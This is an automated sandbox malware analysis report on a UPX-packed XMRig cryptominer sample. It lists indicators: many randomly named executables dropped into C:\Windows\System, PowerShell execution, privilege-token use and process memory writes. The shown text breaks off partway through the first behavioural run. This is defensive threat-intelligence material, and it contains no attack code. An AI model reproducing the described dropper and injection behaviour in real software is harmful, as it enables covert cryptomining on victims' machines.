Malware Analysis Report

2025-04-19 16:06

Sample ID 240522-tzcaqahb8z
Target 67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118
SHA256 9fe73420a0b613ceb9f19aeee264354d0ca158fba2f3990a78de31c79a6d49a6
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9fe73420a0b613ceb9f19aeee264354d0ca158fba2f3990a78de31c79a6d49a6

Threat Level: Known bad

The file 67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

XMRig Miner payload

xmrig

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 16:29

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 16:29

Reported

2024-05-22 16:31

Platform

win7-20240221-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\bksPibP.exe N/A
N/A N/A C:\Windows\System\sOaBmhh.exe N/A
N/A N/A C:\Windows\System\LDSfORn.exe N/A
N/A N/A C:\Windows\System\lYBDLYz.exe N/A
N/A N/A C:\Windows\System\ldMzEqP.exe N/A
N/A N/A C:\Windows\System\TnWlnjs.exe N/A
N/A N/A C:\Windows\System\jbgOyTK.exe N/A
N/A N/A C:\Windows\System\klciSum.exe N/A
N/A N/A C:\Windows\System\WVrYPUv.exe N/A
N/A N/A C:\Windows\System\MtgIQZd.exe N/A
N/A N/A C:\Windows\System\nrQzQhy.exe N/A
N/A N/A C:\Windows\System\kBXQCHX.exe N/A
N/A N/A C:\Windows\System\noehAjo.exe N/A
N/A N/A C:\Windows\System\mjiQpnp.exe N/A
N/A N/A C:\Windows\System\hfQCXQu.exe N/A
N/A N/A C:\Windows\System\tqYpyyt.exe N/A
N/A N/A C:\Windows\System\kzPiPMf.exe N/A
N/A N/A C:\Windows\System\tPdArdM.exe N/A
N/A N/A C:\Windows\System\YETLTUm.exe N/A
N/A N/A C:\Windows\System\EfjXvrd.exe N/A
N/A N/A C:\Windows\System\GNpQeCZ.exe N/A
N/A N/A C:\Windows\System\JRyJdAb.exe N/A
N/A N/A C:\Windows\System\YYJcFTD.exe N/A
N/A N/A C:\Windows\System\FrYSWat.exe N/A
N/A N/A C:\Windows\System\ovQpKfw.exe N/A
N/A N/A C:\Windows\System\kAlSEYI.exe N/A
N/A N/A C:\Windows\System\jNerXEI.exe N/A
N/A N/A C:\Windows\System\AnTVHxw.exe N/A
N/A N/A C:\Windows\System\RfcxqqY.exe N/A
N/A N/A C:\Windows\System\YAZtCAP.exe N/A
N/A N/A C:\Windows\System\gQytUGo.exe N/A
N/A N/A C:\Windows\System\lnyzujt.exe N/A
N/A N/A C:\Windows\System\kicfqqD.exe N/A
N/A N/A C:\Windows\System\BEOTsRk.exe N/A
N/A N/A C:\Windows\System\wPTZWWJ.exe N/A
N/A N/A C:\Windows\System\DycljJS.exe N/A
N/A N/A C:\Windows\System\RbcrvoS.exe N/A
N/A N/A C:\Windows\System\AULGNEv.exe N/A
N/A N/A C:\Windows\System\eSMWCwc.exe N/A
N/A N/A C:\Windows\System\SBmSJtr.exe N/A
N/A N/A C:\Windows\System\TgCSrtm.exe N/A
N/A N/A C:\Windows\System\FSSJRJx.exe N/A
N/A N/A C:\Windows\System\TXotyol.exe N/A
N/A N/A C:\Windows\System\pFfrWLW.exe N/A
N/A N/A C:\Windows\System\qXfFTDu.exe N/A
N/A N/A C:\Windows\System\eAWDAZv.exe N/A
N/A N/A C:\Windows\System\jJWcXfX.exe N/A
N/A N/A C:\Windows\System\ksPrnDt.exe N/A
N/A N/A C:\Windows\System\krChldk.exe N/A
N/A N/A C:\Windows\System\myLBLxL.exe N/A
N/A N/A C:\Windows\System\EraJdOQ.exe N/A
N/A N/A C:\Windows\System\UBYxTKH.exe N/A
N/A N/A C:\Windows\System\GgCCLxv.exe N/A
N/A N/A C:\Windows\System\dmjbQDw.exe N/A
N/A N/A C:\Windows\System\ekplTuL.exe N/A
N/A N/A C:\Windows\System\dFPjVtu.exe N/A
N/A N/A C:\Windows\System\FbrTPSI.exe N/A
N/A N/A C:\Windows\System\YyhEToY.exe N/A
N/A N/A C:\Windows\System\LvxqMTC.exe N/A
N/A N/A C:\Windows\System\ADyChig.exe N/A
N/A N/A C:\Windows\System\aqzKZVc.exe N/A
N/A N/A C:\Windows\System\ZmMdKiq.exe N/A
N/A N/A C:\Windows\System\GzHzaUf.exe N/A
N/A N/A C:\Windows\System\dGKvpzK.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\sLDvPQr.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\AGHwJWj.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\dESOoGU.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\QWrkiiU.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\uVmGdYw.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\DZgghvH.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\IIOIFvN.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\EfjXvrd.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\SzfiqjZ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\hJqRZtq.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\IBYsFxe.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\FqHSaJJ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\XbrUlQQ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wAmfCBq.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\YzonpaJ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\NsqMfYW.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ePBgxBo.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\uYTEmvd.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\Eirybxs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\HNewUqY.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\spCWdRF.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\AXzyFap.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\liRRzJp.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\BBLLcFs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\mjiQpnp.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\VxsaUzp.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\dSHNnVn.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wWkEjXR.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\JpaXjFK.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\VRngiIX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\NCBnuzY.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\UsCtzvv.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ZabcTry.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\xvMNLzg.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\cUluNQF.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\wCUKwoP.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\kuVZBow.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\adTKriE.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\lJSsZOu.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\EIhyoTs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\QjzJNPc.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\AppIbqs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\KtTRygc.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\QlbfdJa.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\PGSwQod.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\HBCvcOQ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\KGioMAs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\YnBmYLs.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\MCAdrkN.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\LTYAnnE.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\udAZaJX.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\UbEXJay.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\UrQQBxi.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\HejpcZg.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\qktSXVi.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\EeInzOn.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\AigSTgc.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\jDuRLNQ.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\ePfNDRT.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\oRrzAAT.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\HbQywzv.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\rLIoEhj.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\rwHhsHl.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
File created C:\Windows\System\DaHNnxd.exe C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1540 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1540 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1540 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\bksPibP.exe
PID 1540 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\bksPibP.exe
PID 1540 wrote to memory of 2612 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\bksPibP.exe
PID 1540 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\sOaBmhh.exe
PID 1540 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\sOaBmhh.exe
PID 1540 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\sOaBmhh.exe
PID 1540 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\LDSfORn.exe
PID 1540 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\67e32a2ed4ec86539bb2a5d351f43c21_JaffaCakes118.exe C:\Windows\System\LDSfORn.exe
